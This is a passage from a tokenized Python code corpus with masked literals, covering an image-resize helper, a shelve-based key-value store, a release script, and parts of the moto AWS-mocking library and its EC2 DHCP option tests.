... ] , <EOL> self . screen_buffer [ index - <NUM_LIT:1> , ... ] ) <EOL> return self . resize_image ( max_image ) <EOL> def resize_image ( self , image ) : <EOL> """<STR_LIT>""" <EOL> if self . resize_method == '<STR_LIT>' : <EOL> resize_height = int ( round ( <EOL> float ( self . height ) * self . resized_width / self . width ) ) <EOL> resized = cv2 . resize ( image , <EOL> ( self . resized_width , resize_height ) , <EOL> interpolation = cv2 . INTER_LINEAR ) <EOL> crop_y_cutoff = resize_height - CROP_OFFSET - self . resized_height <EOL> cropped = resized [ crop_y_cutoff : <EOL> crop_y_cutoff + self . resized_height , : ] <EOL> return cropped <EOL> elif self . resize_method == '<STR_LIT>' : <EOL> return cv2 . resize ( image , <EOL> ( self . resized_width , self . resized_height ) , <EOL> interpolation = cv2 . INTER_LINEAR ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from . import node as N <EOL> from . import node_position as NP <EOL> import redhawk . utils . util as U <EOL> class TreeConverter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename = None ) : <EOL> self . filename = filename <EOL> return <EOL> def ThrowNotImplementedError ( self , tree ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % ( tree . __class__ . __name__ . capitalize ( ) ) ) <EOL> def AttachParents ( self , tree , parent = None ) : <EOL> """<STR_LIT>""" <EOL> tree . SetParent ( parent ) <EOL> for c in tree . GetFlattenedChildren ( ) : <EOL> if c is not None : <EOL> try : <EOL> self . AttachParents ( c , tree ) <EOL> except AttributeError as e : <EOL> print ( c , parent , tree ) <EOL> raise AttributeError ( e ) <EOL> return <EOL> def Convert ( self , tree ) : <EOL> """<STR_LIT>""" <EOL> if tree is None : <EOL> l_ast = N . Module ( position = NP . NodePosition ( self . filename , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> filename = self . filename , <EOL> children = [ ] ) <EOL> else : <EOL> l_ast = self . ConvertTree ( tree ) <EOL> self . AttachParents ( l_ast ) <EOL> return l_ast <EOL> def ConvertTree ( self , tree ) : <EOL> method = "<STR_LIT>" + tree . __class__ . __name__ . capitalize ( ) <EOL> visitor = getattr ( self , method , self . ThrowNotImplementedError ) <EOL> return visitor ( tree ) <EOL> def ConvertListOfStatements ( self , statements ) : <EOL> """<STR_LIT>""" <EOL> return [ self . ConvertTree ( statement ) for statement in statements ] </s>
<s> a = <NUM_LIT:2> <EOL> if a == <NUM_LIT:2> : <EOL> b = <NUM_LIT:2> <EOL> elif a == <NUM_LIT:3> : <EOL> b = <NUM_LIT:3> <EOL> else : <EOL> b = <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import redhawk <EOL> try : <EOL> import anydbm <EOL> except ImportError : <EOL> import dbm as anydbm <EOL> import logging <EOL> import os <EOL> import shelve <EOL> import sys <EOL> VERSION_KEY = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def _OpenStore ( store_file ) : <EOL> return shelve . open ( store_file , '<STR_LIT:c>' , protocol = - <NUM_LIT:1> ) <EOL> def _CloseStoreObject ( store_object ) : <EOL> store_object . close ( ) <EOL> def CreateNewStore ( store_file , version ) : <EOL> """<STR_LIT>""" <EOL> assert ( os . path . exists ( store_file ) == False ) <EOL> store = _OpenStore ( store_file ) <EOL> store [ VERSION_KEY ] = version <EOL> _CloseStoreObject ( store ) <EOL> assert ( os . path . exists ( store_file ) == True ) <EOL> return None <EOL> def RemoveExistingStore ( store_file ) : <EOL> """<STR_LIT>""" <EOL> assert ( os . path . exists ( store_file ) == True ) <EOL> os . remove ( store_file ) <EOL> assert ( os . path . exists ( store_file ) == False ) <EOL> return None <EOL> def IsValidStore ( store_file ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> store = _OpenStore ( store_file ) <EOL> _CloseStoreObject ( store ) <EOL> except anydbm . error as e : <EOL> return False <EOL> return True <EOL> class KeyValueStore : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , store_file , version ) : <EOL> self . version = version <EOL> self . store_file = store_file <EOL> self . store = _OpenStore ( store_file ) <EOL> if ( VERSION_KEY not in self . store or <EOL> self . store [ VERSION_KEY ] != version ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . ClearStore ( ) <EOL> return <EOL> def ClearStore ( self ) : <EOL> _CloseStoreObject ( self . store ) <EOL> RemoveExistingStore ( self . store_file ) <EOL> CreateNewStore ( self . store_file , redhawk . GetVersion ( ) ) <EOL> self . store = shelve . open ( self . store_file ) <EOL> return <EOL> def Close ( self ) : <EOL> _CloseStoreObject ( self . store ) <EOL> def Write ( self ) : <EOL> _CloseStoreObject ( self . store ) <EOL> self . store = _OpenStore ( self . store_file ) <EOL> def GetVersion ( self ) : <EOL> return self . store [ VERSION_KEY ] <EOL> def HasKey ( self , key ) : <EOL> return key in self . store <EOL> def Get ( self , key ) : <EOL> assert ( key != VERSION_KEY ) <EOL> return self . store [ key ] <EOL> def Set ( self , key , value ) : <EOL> assert ( key != VERSION_KEY ) <EOL> self . store [ key ] = value <EOL> def RemoveKey ( self , key ) : <EOL> self . store . pop ( key ) <EOL> def GetKeys ( self ) : <EOL> return ( i for i in self . store . keys ( ) if i != VERSION_KEY ) </s>
<s> from adapter import * </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import time <EOL> from subprocess import call as subcall <EOL> app = '<STR_LIT>' <EOL> version = __import__ ( app ) . __version__ <EOL> def call ( cmd ) : <EOL> try : <EOL> response = subcall ( cmd , shell = True ) <EOL> print <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if response < <NUM_LIT:0> : <EOL> sys . exit ( response ) <EOL> except OSError , E : <EOL> sys . exit ( E ) <EOL> def cleanup ( ) : <EOL> call ( '<STR_LIT>' ) <EOL> def tag ( ) : <EOL> call ( '<STR_LIT>' % ( version , version ) ) <EOL> def upload ( ) : <EOL> call ( '<STR_LIT>' ) <EOL> def main ( ) : <EOL> cleanup ( ) <EOL> tag ( ) <EOL> upload ( ) <EOL> cleanup ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import sys <EOL> from setuptools import setup <EOL> requires = [ '<STR_LIT>' ] <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> requires += [ '<STR_LIT>' ] <EOL> else : <EOL> requires += [ '<STR_LIT>' ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = requires , <EOL> include_package_data = True , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from . models import cloudformation_backends <EOL> from . . core . models import MockAWS <EOL> cloudformation_backend = cloudformation_backends [ '<STR_LIT>' ] <EOL> def mock_cloudformation ( func = None ) : <EOL> if func : <EOL> return MockAWS ( cloudformation_backends ) ( func ) <EOL> else : <EOL> return MockAWS ( cloudformation_backends ) </s>
<s> from __future__ import unicode_literals <EOL> from . models import dynamodb_backend2 <EOL> mock_dynamodb2 = dynamodb_backend2 . decorator </s>
<s> from __future__ import unicode_literals <EOL> from moto . core . responses import BaseResponse <EOL> from moto . ec2 . utils import filters_from_querystring <EOL> class SpotInstances ( BaseResponse ) : <EOL> def cancel_spot_instance_requests ( self ) : <EOL> request_ids = self . _get_multi_param ( '<STR_LIT>' ) <EOL> requests = self . ec2_backend . cancel_spot_instance_requests ( request_ids ) <EOL> template = self . response_template ( CANCEL_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> def create_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def delete_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def describe_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def describe_spot_instance_requests ( self ) : <EOL> filters = filters_from_querystring ( self . querystring ) <EOL> requests = self . ec2_backend . describe_spot_instance_requests ( filters = filters ) <EOL> template = self . response_template ( DESCRIBE_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> def describe_spot_price_history ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def request_spot_instances ( self ) : <EOL> price = self . _get_param ( '<STR_LIT>' ) <EOL> image_id = self . _get_param ( '<STR_LIT>' ) <EOL> count = self . _get_int_param ( '<STR_LIT>' ) <EOL> type = self . _get_param ( '<STR_LIT>' ) <EOL> valid_from = self . _get_param ( '<STR_LIT>' ) <EOL> valid_until = self . _get_param ( '<STR_LIT>' ) <EOL> launch_group = self . _get_param ( '<STR_LIT>' ) <EOL> availability_zone_group = self . _get_param ( '<STR_LIT>' ) <EOL> key_name = self . _get_param ( '<STR_LIT>' ) <EOL> security_groups = self . _get_multi_param ( '<STR_LIT>' ) <EOL> user_data = self . _get_param ( '<STR_LIT>' ) <EOL> instance_type = self . _get_param ( '<STR_LIT>' ) <EOL> placement = self . _get_param ( '<STR_LIT>' ) <EOL> kernel_id = self . _get_param ( '<STR_LIT>' ) <EOL> ramdisk_id = self . _get_param ( '<STR_LIT>' ) <EOL> monitoring_enabled = self . _get_param ( '<STR_LIT>' ) <EOL> subnet_id = self . _get_param ( '<STR_LIT>' ) <EOL> requests = self . ec2_backend . request_spot_instances ( <EOL> price = price , <EOL> image_id = image_id , <EOL> count = count , <EOL> type = type , <EOL> valid_from = valid_from , <EOL> valid_until = valid_until , <EOL> launch_group = launch_group , <EOL> availability_zone_group = availability_zone_group , <EOL> key_name = key_name , <EOL> security_groups = security_groups , <EOL> user_data = user_data , <EOL> instance_type = instance_type , <EOL> placement = placement , <EOL> kernel_id = kernel_id , <EOL> ramdisk_id = ramdisk_id , <EOL> monitoring_enabled = monitoring_enabled , <EOL> subnet_id = subnet_id , <EOL> ) <EOL> template = self . response_template ( REQUEST_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> REQUEST_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" <EOL> DESCRIBE_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" <EOL> CANCEL_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" </s>
<s> from __future__ import unicode_literals <EOL> import hashlib <EOL> import boto . glacier <EOL> from moto . core import BaseBackend <EOL> from . utils import get_job_id <EOL> class ArchiveJob ( object ) : <EOL> def __init__ ( self , job_id , archive_id ) : <EOL> self . job_id = job_id <EOL> self . archive_id = archive_id <EOL> def to_dict ( self ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . archive_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:0>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : self . job_id , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> class Vault ( object ) : <EOL> def __init__ ( self , vault_name , region ) : <EOL> self . vault_name = vault_name <EOL> self . region = region <EOL> self . archives = { } <EOL> self . jobs = { } <EOL> @ property <EOL> def arn ( self ) : <EOL> return "<STR_LIT>" . format ( self . region , self . vault_name ) <EOL> def to_dict ( self ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : self . arn , <EOL> "<STR_LIT>" : self . vault_name , <EOL> } <EOL> def create_archive ( self , body ) : <EOL> archive_id = hashlib . sha256 ( body ) . hexdigest ( ) <EOL> self . archives [ archive_id ] = body <EOL> return archive_id <EOL> def get_archive_body ( self , archive_id ) : <EOL> return self . archives [ archive_id ] <EOL> def delete_archive ( self , archive_id ) : <EOL> return self . archives . pop ( archive_id ) <EOL> def initiate_job ( self , archive_id ) : <EOL> job_id = get_job_id ( ) <EOL> job = ArchiveJob ( job_id , archive_id ) <EOL> self . jobs [ job_id ] = job <EOL> return job_id <EOL> def list_jobs ( self ) : <EOL> return self . jobs . values ( ) <EOL> def describe_job ( self , job_id ) : <EOL> return self . jobs . get ( job_id ) <EOL> def get_job_output ( self , job_id ) : <EOL> job = self . describe_job ( job_id ) <EOL> archive_body = self . get_archive_body ( job . archive_id ) <EOL> return archive_body <EOL> class GlacierBackend ( BaseBackend ) : <EOL> def __init__ ( self , region_name ) : <EOL> self . vaults = { } <EOL> self . region_name = region_name <EOL> def reset ( self ) : <EOL> region_name = self . region_name <EOL> self . __dict__ = { } <EOL> self . __init__ ( region_name ) <EOL> def get_vault ( self , vault_name ) : <EOL> return self . vaults [ vault_name ] <EOL> def create_vault ( self , vault_name ) : <EOL> self . vaults [ vault_name ] = Vault ( vault_name , self . region_name ) <EOL> def list_vaules ( self ) : <EOL> return self . vaults . values ( ) <EOL> def delete_vault ( self , vault_name ) : <EOL> self . vaults . pop ( vault_name ) <EOL> def initiate_job ( self , vault_name , archive_id ) : <EOL> vault = self . get_vault ( vault_name ) <EOL> job_id = vault . initiate_job ( archive_id ) <EOL> return job_id <EOL> def list_jobs ( self , vault_name ) : <EOL> vault = self . get_vault ( vault_name ) <EOL> return vault . list_jobs ( ) <EOL> glacier_backends = { } <EOL> for region in boto . glacier . regions ( ) : <EOL> glacier_backends [ region . name ] = GlacierBackend ( region ) </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> from werkzeug . exceptions import BadRequest <EOL> class RDSClientError ( BadRequest ) : <EOL> def __init__ ( self , code , message ) : <EOL> super ( RDSClientError , self ) . __init__ ( ) <EOL> self . description = json . dumps ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : code , <EOL> "<STR_LIT>" : message , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> class DBInstanceNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , database_identifier ) : <EOL> super ( DBInstanceNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( database_identifier ) ) <EOL> class DBSecurityGroupNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , security_group_name ) : <EOL> super ( DBSecurityGroupNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( security_group_name ) ) <EOL> class DBSubnetGroupNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , subnet_group_name ) : <EOL> super ( DBSubnetGroupNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( subnet_group_name ) ) </s>
<s> from __future__ import unicode_literals <EOL> from moto . core . exceptions import RESTError <EOL> class MessageRejectedError ( RESTError ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , message ) : <EOL> super ( MessageRejectedError , self ) . __init__ ( <EOL> "<STR_LIT>" , message ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> import uuid <EOL> from moto . core . utils import unix_time <EOL> from . . exceptions import SWFWorkflowExecutionClosedError <EOL> from . timeout import Timeout <EOL> class DecisionTask ( object ) : <EOL> def __init__ ( self , workflow_execution , scheduled_event_id ) : <EOL> self . workflow_execution = workflow_execution <EOL> self . workflow_type = workflow_execution . workflow_type <EOL> self . task_token = str ( uuid . uuid4 ( ) ) <EOL> self . scheduled_event_id = scheduled_event_id <EOL> self . previous_started_event_id = <NUM_LIT:0> <EOL> self . started_event_id = None <EOL> self . started_timestamp = None <EOL> self . start_to_close_timeout = self . workflow_execution . task_start_to_close_timeout <EOL> self . state = "<STR_LIT>" <EOL> self . scheduled_at = datetime . utcnow ( ) <EOL> self . timeout_type = None <EOL> @ property <EOL> def started ( self ) : <EOL> return self . state == "<STR_LIT>" <EOL> def _check_workflow_execution_open ( self ) : <EOL> if not self . workflow_execution . open : <EOL> raise SWFWorkflowExecutionClosedError ( ) <EOL> def to_full_dict ( self , reverse_order = False ) : <EOL> events = self . workflow_execution . events ( reverse_order = reverse_order ) <EOL> hsh = { <EOL> "<STR_LIT>" : [ <EOL> evt . to_dict ( ) for evt in events <EOL> ] , <EOL> "<STR_LIT>" : self . task_token , <EOL> "<STR_LIT>" : self . previous_started_event_id , <EOL> "<STR_LIT>" : self . workflow_execution . to_short_dict ( ) , <EOL> "<STR_LIT>" : self . workflow_type . to_short_dict ( ) , <EOL> } <EOL> if self . started_event_id : <EOL> hsh [ "<STR_LIT>" ] = self . started_event_id <EOL> return hsh <EOL> def start ( self , started_event_id ) : <EOL> self . state = "<STR_LIT>" <EOL> self . started_timestamp = unix_time ( ) <EOL> self . started_event_id = started_event_id <EOL> def complete ( self ) : <EOL> self . _check_workflow_execution_open ( ) <EOL> self . state = "<STR_LIT>" <EOL> def first_timeout ( self ) : <EOL> if not self . started or not self . workflow_execution . open : <EOL> return None <EOL> start_to_close_at = self . started_timestamp + int ( self . start_to_close_timeout ) <EOL> _timeout = Timeout ( self , start_to_close_at , "<STR_LIT>" ) <EOL> if _timeout . reached : <EOL> return _timeout <EOL> def process_timeouts ( self ) : <EOL> _timeout = self . first_timeout ( ) <EOL> if _timeout : <EOL> self . timeout ( _timeout ) <EOL> def timeout ( self , _timeout ) : <EOL> self . _check_workflow_execution_open ( ) <EOL> self . state = "<STR_LIT>" <EOL> self . timeout_type = _timeout . kind </s>
<s> from __future__ import unicode_literals <EOL> template = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } <EOL> } <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import tests . backport_assert_raises <EOL> from nose . tools import assert_raises <EOL> import boto3 <EOL> import boto <EOL> from boto . exception import EC2ResponseError <EOL> import sure <EOL> from moto import mock_ec2 <EOL> SAMPLE_DOMAIN_NAME = u'<STR_LIT>' <EOL> SAMPLE_NAME_SERVERS = [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> rval = conn . associate_dhcp_options ( dhcp_options . id , vpc . id ) <EOL> rval . should . be . equal ( True ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate_invalid_dhcp_id ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . associate_dhcp_options ( "<STR_LIT:foo>" , vpc . id ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate_invalid_vpc_id ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . associate_dhcp_options ( dhcp_options . id , "<STR_LIT:foo>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_options_delete_with_vpc ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> dhcp_options_id = dhcp_options . id <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> rval = conn . associate_dhcp_options ( dhcp_options_id , vpc . id ) <EOL> rval . should . be . equal ( True ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( dhcp_options_id ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> vpc . delete ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ dhcp_options_id ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_create_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( SAMPLE_DOMAIN_NAME ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( SAMPLE_NAME_SERVERS [ <NUM_LIT:0> ] ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:1> ] . should . be . equal ( SAMPLE_NAME_SERVERS [ <NUM_LIT:1> ] ) <EOL> @ mock_ec2 <EOL> def test_create_dhcp_options_invalid_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> servers = [ "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" ] <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . create_dhcp_options ( ntp_servers = servers ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . create_dhcp_options ( netbios_node_type = "<STR_LIT:0>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_describe_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_options = conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options = conn . get_all_dhcp_options ( ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> @ mock_ec2 <EOL> def test_describe_dhcp_options_invalid_id ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ "<STR_LIT:1>" ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_options = conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_dhcp_options ( dhcp_option . id ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options_invalid_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( "<STR_LIT>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options_malformed_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( "<STR_LIT>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_tagging ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_option . add_tag ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> tag = conn . get_all_tags ( ) [ <NUM_LIT:0> ] <EOL> tag . name . should . equal ( "<STR_LIT>" ) <EOL> tag . value . should . equal ( "<STR_LIT>" ) <EOL> dhcp_option = conn . get_all_dhcp_options ( ) [ <NUM_LIT:0> ] <EOL> dhcp_option . tags . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_option . tags [ "<STR_LIT>" ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_tag ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp1 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp1 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp2 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp2 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp2 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT:Name>' ] . should . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ 